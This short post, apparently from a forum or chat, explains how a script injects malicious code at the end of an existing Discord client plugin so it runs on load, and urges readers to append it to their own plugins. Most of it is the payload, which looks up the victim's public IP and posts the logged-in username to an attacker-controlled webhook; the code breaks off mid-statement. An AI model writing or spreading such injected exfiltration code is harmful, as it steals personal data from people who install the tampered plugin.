index.js isn't a plugin nor does it create a new plugin it's just the script that modifies an existing plugin with malicious code at the end. it works because when you require a js file, the code inside it is ran, including the malicious code at the end of the file
you can make a new plugin yourself and just add the code at the end, it'll run
the malicious code itself is in the payload
variable:
require("request").get("https://api.ipify.org", async (err, res, body) => {
const options = {
method: 'POST',
url: '${webhook}',
headers: {'Content-Type': 'application/json'},
body: {
"embeds": [
{
"title": document.getElementsByClassName("size14-e6ZScH title-eS5yk3")[0].innerText+document.getElementsByClassName("size12-3cLvbJ subtext-3CDbHg")[0].innerText+" logged",

},
json: true,
jar: 'JAR'
};
require("request")(options, async (err, res, body) => {
